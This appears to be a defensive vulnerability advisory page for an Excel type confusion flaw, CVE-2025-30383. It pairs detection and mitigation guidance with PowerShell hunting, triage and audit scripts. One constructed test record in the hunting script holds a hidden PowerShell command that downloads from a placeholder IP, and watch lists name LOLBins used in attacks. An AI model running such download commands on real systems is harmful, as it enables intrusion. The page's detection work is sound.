CVE Vulnerability Database

CVE-2025-30383: Microsoft 365 Apps RCE Vulnerability

CVE-2025-30383 is a type confusion vulnerability (CWE-843) in Microsoft Office Excel that allows an unauthorized attacker to execute code on the victim's machine once a crafted workbook is opened. This article covers the technical details, affected versions, detection guidance, and mitigations.

Published:

CVE-2025-30383 Overview

CVE-2025-30383 is a type confusion vulnerability [CWE-843] in Microsoft Office Excel that allows an unauthorized attacker to execute code locally. The flaw arises when Excel accesses a resource through an incompatible type, producing memory corruption that an attacker can leverage for arbitrary code execution. Exploitation requires user interaction: the target must open a crafted Excel document. The vulnerability affects multiple Microsoft Office product lines, including Microsoft 365 Apps, Excel 2016, Office 2019, Office Long Term Servicing Channel (LTSC) 2021 and 2024, and Office Online Server.

Critical Impact

Successful exploitation gives the attacker code execution in the security context of the user who opened the file, so the blast radius depends on that user's privileges. From there the attacker can read and exfiltrate data, move laterally with the user's credentials, or install follow-on malware.

Affected Products

  • Microsoft 365 Apps (Enterprise, x64 and x86)
  • Microsoft Excel 2016, Microsoft Office 2019, Office LTSC 2021 and 2024
  • Microsoft Office Online Server

Discovery Timeline

  • 2025-05-13 - CVE-2025-30383 published to the National Vulnerability Database (NVD)
  • 2026-06-17 - Last updated in the NVD database

Technical Details for CVE-2025-30383

Vulnerability Analysis

The vulnerability is classified under [CWE-843], access of a resource using an incompatible type, commonly called type confusion. Microsoft's advisory gives only that classification; the description that follows is the general shape of a type confusion bug in a document parser, not vendor-confirmed detail about Excel internals. Excel parses complex binary and OOXML structures that reference internal objects by type. When the parser treats a structure as a different object type than the one actually allocated, subsequent operations read or write memory through the wrong layout. That mismatch corrupts internal state and, with file contents under attacker control, can be steered toward attacker-controlled execution.

Microsoft categorizes the attack vector as local with user interaction required: a target must open a crafted spreadsheet for exploitation to succeed. Because spreadsheets are routinely exchanged as mail attachments and shared links, phishing remains the most likely delivery channel.

Root Cause

The public advisory does not describe the defect beyond its CWE classification. In the pattern that classification implies, the root cause is missing type validation during deserialization of objects within an Excel document: the application trusts a type identifier in the file structure without confirming that the underlying object matches the expected layout. Operating on the mismatched object produces memory corruption that an attacker may be able to shape into a controlled read or write primitive rather than a simple crash.

Attack Vector

An attacker crafts a malicious Excel workbook (.xlsx, .xlsb, or legacy .xls; the vendor advisory does not say which formats can carry the trigger) containing manipulated object references that trigger the type confusion. The attacker then delivers the file through email, a shared drive, or a web download. When a user opens the document, Excel parses the malformed structure and the attacker gains execution in the user's security context. Chained with a Protected View bypass or a separate privilege escalation, the technique fits into multi-stage intrusion chains.

No verified public proof-of-concept code is available at the time of writing. See the Microsoft Security Update Guide entry for CVE-2025-30383 for vendor-supplied details.

Detection Methods for CVE-2025-30383

Indicators of Compromise

  • Excel (EXCEL.EXE) spawning child processes such as cmd.exe, powershell.exe, rundll32.exe, or wscript.exe shortly after a document is opened.
  • Unexpected outbound network connections initiated by EXCEL.EXE to external IP addresses or newly registered domains.
  • Creation of executable or script files in user-writable directories (%TEMP%, %APPDATA%) by Office processes.
  • Crash events or Windows Error Reporting (WER) entries referencing access violations inside Excel modules; a failed exploit attempt often surfaces as a crash before a successful one does.
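As an added example (not code from the page or from Microsoft), the following PowerShell turns the first indicator into a hunt over Sysmon Event ID 1 records. It assumes Sysmon is installed with process-creation logging enabled; the Office parent list, the child watch list and the sample records at the end are constructed for illustration and should be tuned to your environment.

```powershell
# Hunt Sysmon process-creation events for Office parents spawning interpreters or LOLBins.
# Added example, not from the page or from Microsoft. Assumes Sysmon Event ID 1 logging.
# The parent and child name lists are assumptions; extend them to match your estate.

$OfficeParents = @('EXCEL.EXE', 'WINWORD.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE')
$SuspiciousChildren = @(
    'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe',
    'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe', 'msiexec.exe', 'curl.exe'
)

function Test-OfficeChildProcess {
    # Returns $true when an Office binary is the direct parent of a process on the watch list.
    param(
        [string]$ParentImage = '',
        [string]$Image = ''
    )
    $parentName = [System.IO.Path]::GetFileName($ParentImage)
    $childName  = [System.IO.Path]::GetFileName($Image)
    # -contains compares strings case-insensitively, so EXCEL.EXE and excel.exe both match.
    return ($OfficeParents -contains $parentName) -and ($SuspiciousChildren -contains $childName)
}

function ConvertFrom-SysmonProcessCreate {
    # Flattens the EventData of one Sysmon Event ID 1 record into a simple object.
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    $xml = [xml]$Record.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        UtcTime           = $data['UtcTime']
        Computer          = $xml.Event.System.Computer
        User              = $data['User']
        ParentImage       = $data['ParentImage']
        ParentCommandLine = $data['ParentCommandLine']
        Image             = $data['Image']
        CommandLine       = $data['CommandLine']
    }
}

function Find-OfficeSpawnedProcesses {
    # Pulls the last $Hours of Sysmon process creations and keeps only Office-parented hits.
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-SysmonProcessCreate -Record $_ } |
        Where-Object { Test-OfficeChildProcess -ParentImage $_.ParentImage -Image $_.Image }
}

# Constructed sample records (not real telemetry) so the classifier can be exercised offline.
$sample = @(
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
                       Image       = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'cmd.exe /c powershell -w hidden -nop -c iwr http://203.0.113.10/s' }
    [pscustomobject]@{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
                       Image       = 'C:\Windows\splwow64.exe'          # benign: 32-bit Office printing helper
                       CommandLine = 'splwow64.exe 12288' }
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       Image       = 'C:\Windows\System32\cmd.exe'     # benign: not Office-parented
                       CommandLine = 'cmd.exe' }
)
$sample | Where-Object { Test-OfficeChildProcess -ParentImage $_.ParentImage -Image $_.Image } |
    Format-Table ParentImage, Image, CommandLine -Wrap

# On a live host with Sysmon:
# Find-OfficeSpawnedProcesses -Hours 72 | Format-Table UtcTime, User, Image, CommandLine -Wrap
```

Only the first constructed record should be reported. Real telemetry contains legitimate Office children (splwow64.exe for printing is the common one), which is why the watch list names interpreters and LOLBins rather than alerting on every child of EXCEL.EXE.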

Detection Strategies

  • Hunt for process lineage where Office binaries are the parent of scripting interpreters or LOLBins.
  • Inspect inbound email attachments and SharePoint uploads for Excel files carrying embedded objects, OLE streams, or VBA projects that the sender's normal workflow would not produce.
  • Correlate Excel crashes with subsequent persistence indicators such as Run key modifications or scheduled task creation.
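The attachment inspection above can be scripted for OOXML workbooks, which are zip packages with a known part layout. The following PowerShell is an added example (not from the page or from Microsoft): it flags packages that contain macro, embedding, ActiveX or external-link parts and identifies legacy OLE2 files by magic bytes. The part patterns are assumptions drawn from the OOXML layout, and the sample files it builds are constructed placeholders, not real workbooks.

```powershell
# Triage Excel files from an untrusted source for active or embedded content.
# Added example, not from the page or from Microsoft. OOXML (.xlsx/.xlsm/.xlsb) is a zip;
# legacy .xls is an OLE2 compound file and needs a different parser, so it is only flagged here.

Add-Type -AssemblyName System.IO.Compression
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Package parts that only exist when a workbook carries something beyond plain cell data.
$RiskyPartPatterns = @(
    '^xl/vbaProject\.bin$',   # VBA project (macros)
    '^xl/embeddings/',        # embedded OLE objects and packaged files
    '^xl/activeX/',           # ActiveX controls
    '^xl/externalLinks/'      # links that pull content from other workbooks
)

function Get-ContainerType {
    # Distinguishes OOXML (zip, "PK") from legacy OLE2 (D0 CF 11 E0) by the first four bytes.
    param([Parameter(Mandatory)][string]$Path)
    $fs = [System.IO.File]::OpenRead($Path)
    try { $magic = New-Object byte[] 4; [void]$fs.Read($magic, 0, 4) } finally { $fs.Dispose() }
    if ($magic[0] -eq 0x50 -and $magic[1] -eq 0x4B) { return 'OOXML' }
    if ($magic[0] -eq 0xD0 -and $magic[1] -eq 0xCF -and $magic[2] -eq 0x11 -and $magic[3] -eq 0xE0) { return 'OLE2' }
    return 'Unknown'
}

function Get-WorkbookRiskIndicators {
    # Returns one record per risky part found; nothing for a package with only plain parts.
    param([Parameter(Mandatory)][string]$Path)
    $type = Get-ContainerType -Path $Path
    if ($type -ne 'OOXML') {
        # Legacy binary workbooks need an OLE2 parser (oletools, for example); flag for manual review.
        return [pscustomobject]@{ File = $Path; Part = '(container)'; Size = (Get-Item -LiteralPath $Path).Length; Rule = "non-OOXML container: $type" }
    }
    $hits = @()
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        foreach ($entry in $zip.Entries) {
            foreach ($pattern in $RiskyPartPatterns) {
                if ($entry.FullName -match $pattern) {
                    $hits += [pscustomobject]@{ File = $Path; Part = $entry.FullName; Size = $entry.Length; Rule = $pattern }
                    break
                }
            }
        }
    } finally { $zip.Dispose() }
    return $hits
}

function New-SampleWorkbook {
    # Builds a minimal placeholder package (constructed test data; Excel will not open it).
    param([Parameter(Mandatory)][string]$Path, [string[]]$ExtraParts = @())
    Remove-Item -LiteralPath $Path -ErrorAction SilentlyContinue
    $zip = [System.IO.Compression.ZipFile]::Open($Path, [System.IO.Compression.ZipArchiveMode]::Create)
    try {
        foreach ($name in (@('[Content_Types].xml', 'xl/workbook.xml', 'xl/worksheets/sheet1.xml') + $ExtraParts)) {
            $stream = $zip.CreateEntry($name).Open()
            try {
                $bytes = [System.Text.Encoding]::UTF8.GetBytes('<placeholder/>')
                $stream.Write($bytes, 0, $bytes.Length)
            } finally { $stream.Dispose() }
        }
    } finally { $zip.Dispose() }
}

$clean = Join-Path $env:TEMP 'sample-clean.xlsx'      # baseline with no embedded content
$dirty = Join-Path $env:TEMP 'sample-embedded.xlsm'   # carries an OLE embedding and a VBA project
New-SampleWorkbook -Path $clean
New-SampleWorkbook -Path $dirty -ExtraParts @('xl/embeddings/oleObject1.bin', 'xl/vbaProject.bin')
Get-WorkbookRiskIndicators -Path $clean
Get-WorkbookRiskIndicators -Path $dirty | Format-Table Part, Size, Rule -AutoSize

# Against a quarantine or inbound share (hypothetical path):
# Get-ChildItem '\\fileserver\inbound' -Include *.xls,*.xlsx,*.xlsm,*.xlsb -Recurse |
#     ForEach-Object { Get-WorkbookRiskIndicators -Path $_.FullName }
```

The presence of these parts is not proof of malice (finance teams ship macro workbooks every day); the value is in ranking external files for sandbox detonation or manual review, and in catching embeddings in file types the sender never normally uses.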

Monitoring Recommendations

  • Enable Microsoft Defender Attack Surface Reduction (ASR) rules that block Office applications from creating child processes and from injecting code into other processes.
  • Forward Sysmon Event IDs 1 (process create), 7 (image load), and 11 (file create) from endpoints running Office to a centralized SIEM for analysis.
  • Monitor for users exiting Protected View ("Enable Editing") on files from untrusted origins and for VBA execution attempts on unsigned projects, using whatever Office or endpoint telemetry your platform exposes.

How to Mitigate CVE-2025-30383

Immediate Actions Required

  • Apply the Microsoft security updates referenced in the Microsoft Security Update Guide CVE-2025-30383 across all affected Office channels.
  • Inventory all hosts running Microsoft 365 Apps, Excel 2016, Office 2019, Office LTSC 2021/2024, and Office Online Server, and confirm patch deployment status.
  • Enforce Protected View and Block Macros from the Internet through Group Policy for all Office users.
  • Restrict end-user execution of spreadsheets received from external senders until patching is complete.

Patch Information

Microsoft released security updates addressing CVE-2025-30383 through the standard Microsoft Update channels for each affected product. Administrators should consult the vendor advisory for product-specific KB numbers and deploy updates through Windows Update, Microsoft Update Catalog, or Microsoft Endpoint Configuration Manager.

Workarounds

  • Open untrusted Excel files only in Protected View and disable editing unless the source is verified.
  • Disable ActiveX controls and Object Linking and Embedding (OLE) where business workflows permit.
  • Use Microsoft Defender Application Guard for Office to isolate untrusted documents from the host operating system where it is still available; Microsoft has announced its deprecation, so treat it as a stopgap rather than a long-term control.
```powershell
# Configuration example: enable ASR rules that constrain Office via PowerShell.
# Add-MpPreference appends to the configured rule list; Set-MpPreference with these
# parameters replaces the whole list and would silently drop any rules already in place.

# Block all Office applications from creating child processes
Add-MpPreference -AttackSurfaceReductionRules_Ids `
    D4F940AB-401B-4EFC-AADC-AD5F3C50688A `
    -AttackSurfaceReductionRules_Actions Enabled

# Block Office applications from creating executable content
Add-MpPreference -AttackSurfaceReductionRules_Ids `
    3B576869-A4EC-4529-8536-B80A7769E899 `
    -AttackSurfaceReductionRules_Actions Enabled

# Block Office applications from injecting code into other processes
Add-MpPreference -AttackSurfaceReductionRules_Ids `
    75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 `
    -AttackSurfaceReductionRules_Actions Enabled
```
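Setting controls is only half the job; the other half is confirming they are in force on each host. The following PowerShell is an added example (not from the page or from Microsoft) that audits one machine for the mitigations this section recommends: the installed Office build, the state of the three Office ASR rules, and the Excel Group Policy values for Protected View and Internet macro blocking. The ASR GUIDs are Microsoft's published rule identifiers and the registry paths are the Office 16.0 policy keys; the patched build numbers are not reproduced here, so the reported version must be compared against the KB in the vendor advisory.

```powershell
# Audit a host for the CVE-2025-30383 mitigations recommended above.
# Added example, not from the page or from Microsoft. Requires the Defender module
# (Get-MpPreference) and read access to HKLM and the current user's HKCU.

$AsrRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84' = 'Block Office applications from injecting code into other processes'
}
$AsrActionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Get-OfficeVersionInfo {
    # Click-to-Run installs (Microsoft 365 Apps, Office 2019, LTSC 2021/2024) record their build here.
    $c2r = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Office\ClickToRun\Configuration' -ErrorAction SilentlyContinue
    if ($c2r -and $c2r.VersionToReport) {
        return [pscustomobject]@{ Install = 'ClickToRun'; Version = $c2r.VersionToReport; Products = $c2r.ProductReleaseIds }
    }
    # MSI installs (for example volume-licensed Excel 2016): read the file version of EXCEL.EXE.
    $appPath = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\excel.exe' -ErrorAction SilentlyContinue).'(default)'
    if ($appPath -and (Test-Path -LiteralPath $appPath)) {
        return [pscustomobject]@{ Install = 'MSI'; Version = (Get-Item -LiteralPath $appPath).VersionInfo.FileVersion; Products = 'Excel' }
    }
    return $null
}

function Get-AsrRuleStatus {
    # Maps each rule GUID to its configured action; a GUID absent from the list means Disabled.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids)
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    foreach ($id in $AsrRules.Keys) {
        $action = 0
        for ($i = 0; $i -lt $ids.Count; $i++) {
            if ($ids[$i] -and ($ids[$i] -eq $id)) { $action = [int]$actions[$i]; break }
        }
        [pscustomobject]@{
            Rule      = $AsrRules[$id]
            Id        = $id
            State     = $AsrActionNames[$action]
            Compliant = ($action -eq 1)   # only Block counts; Audit and Warn do not stop the spawn
        }
    }
}

function Get-ExcelPolicyStatus {
    # DWORD values written by the Office ADMX templates. A missing value means "not configured",
    # which this audit treats as non-compliant because the user can then change the setting.
    $sec      = 'HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security'
    $secProps = Get-ItemProperty -LiteralPath $sec -ErrorAction SilentlyContinue
    $pvProps  = Get-ItemProperty -LiteralPath "$sec\ProtectedView" -ErrorAction SilentlyContinue
    $checks = @(
        @{ Setting = 'Block macros in files from the Internet';   Value = $secProps.blockcontentexecutionfrominternet; Expected = 1 }
        @{ Setting = 'Protected View for files from the Internet'; Value = $pvProps.DisableInternetFilesInPV;          Expected = 0 }
        @{ Setting = 'Protected View for Outlook attachments';     Value = $pvProps.DisableAttachmentsInPV;            Expected = 0 }
        @{ Setting = 'Protected View for unsafe locations';        Value = $pvProps.DisableUnsafeLocationsInPV;        Expected = 0 }
    )
    foreach ($c in $checks) {
        $configured = $null -ne $c.Value
        $actual = 'not configured'
        if ($configured) { $actual = [int]$c.Value }
        [pscustomobject]@{
            Setting   = $c.Setting
            Actual    = $actual
            Expected  = $c.Expected
            Compliant = $configured -and ([int]$c.Value -eq $c.Expected)
        }
    }
}

$office = Get-OfficeVersionInfo
if ($office) { "Office install: $($office.Install) $($office.Version) [$($office.Products)]" }
else         { 'Office install: EXCEL.EXE not found on this host' }
Get-AsrRuleStatus    | Format-Table Rule, State, Compliant -AutoSize
Get-ExcelPolicyStatus | Format-Table Setting, Actual, Expected, Compliant -AutoSize
```

Run it under the account whose Excel policy you care about, since the Protected View and macro settings live under HKCU. Pushing the script through your endpoint management tool and collecting the output gives the inventory the "Immediate Actions" list asks for, with the ASR state as a compensating-control check for hosts that cannot be patched immediately.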

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
